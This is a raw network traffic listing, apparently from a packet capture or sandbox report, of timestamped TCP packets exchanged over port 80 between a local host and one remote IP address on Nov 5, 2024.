Nov 5, 2024 18:46:10.332884073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332915068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332922935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332933903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332946062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332954884 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332958937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.332967997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.332987070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333002090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333014965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333025932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333036900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333058119 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333070040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333127022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333137989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333152056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333163023 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333173990 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333177090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333184958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333197117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333199978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333206892 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333230019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333239079 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333308935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333321095 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333331108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333340883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333373070 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333379030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333391905 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333398104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333406925 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333424091 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333432913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333462000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333508968 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333512068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333520889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333549976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333559990 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333578110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333587885 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333612919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333622932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333625078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333633900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333643913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333652973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333656073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333664894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333667040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333683014 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333714962 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333739996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333750963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333781004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333789110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333797932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333805084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333808899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333816051 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333817959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.333832026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.333848000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.373465061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.373478889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.373491049 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.373500109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.373524904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.373548985 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.415997028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.416013002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.416023970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.416109085 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.422775984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.422817945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.422828913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.422841072 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.422863960 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.422918081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.422930002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.422940969 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.422951937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.422964096 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.422964096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.422975063 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423007965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423053026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423063993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423074007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423088074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423106909 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423108101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423120022 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423130989 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423131943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423141003 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423152924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423160076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423170090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423176050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423181057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423202038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423211098 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423214912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423221111 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423232079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423254013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423274994 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423412085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423429012 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423439980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423449039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423460007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423461914 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423470974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423491001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423494101 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423502922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423511982 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423513889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423523903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423528910 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423536062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423546076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423557043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423583984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423584938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423593044 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423594952 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423605919 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423624039 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423635006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423635006 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423646927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423682928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423683882 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423696995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423702955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423722029 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423732996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423733950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423742056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423753977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423763037 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423769951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423777103 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423798084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423811913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423851013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423880100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423892021 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423923016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423924923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423933029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423959017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423974037 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.423986912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.423996925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.424007893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.424022913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.424029112 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.424034119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.424048901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.424055099 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.424079895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.435518980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.435587883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.435619116 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.435627937 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.435633898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.435640097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.435646057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.435650110 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.435698986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.435703039 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.435709000 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.435751915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.435762882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.435765028 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.435785055 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.435810089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.435909986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.435956001 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.435981035 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.435992956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436028957 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436079025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436089993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436100006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436111927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436120033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436151028 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436161041 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436172009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436181068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436203003 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436227083 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436242104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436250925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436255932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436266899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436276913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436290026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436314106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436342001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436353922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436372995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436383009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436383009 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436405897 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436435938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436467886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436479092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436490059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436500072 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436511040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436515093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436522961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436533928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436563015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436597109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436611891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436621904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436634064 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436644077 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436652899 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436656952 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436661959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436671972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436681032 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436702013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436755896 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436770916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436783075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436804056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436829090 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436914921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436924934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436935902 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436945915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436956882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436959028 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436968088 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.436980963 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.436980963 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437004089 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437012911 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437046051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437057018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437067032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437077045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437093973 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437108994 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437335968 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437346935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437357903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437378883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437391043 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437421083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437433004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437443018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437454939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437464952 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437494040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437516928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437577009 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437588930 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437598944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437609911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437619925 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437623024 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437632084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437643051 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437645912 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437654018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437669992 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437675953 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437704086 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437727928 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437761068 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437772036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437820911 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437864065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437875986 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437885046 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437896013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.437907934 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437928915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.437999964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.438009024 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.438044071 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.438066959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.438122034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.438133001 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.438143015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.438153982 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.438159943 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.438191891 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.442197084 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.442209005 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.442219973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.442240000 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.442256927 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.442352057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.442395926 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.442413092 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.442459106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.442503929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.442548990 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.442553043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.442564964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.442600965 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.442761898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.442775011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.442785025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.442807913 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.442832947 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.442836046 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.442845106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.442874908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.443244934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.443255901 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.443268061 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.443284035 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.443301916 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.443325996 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.443337917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.443345070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.443353891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.443376064 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.443397999 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.443416119 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.443425894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:10.443465948 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:10.443815947 CET	80	49804	31.41.244.11	192.168.2.4
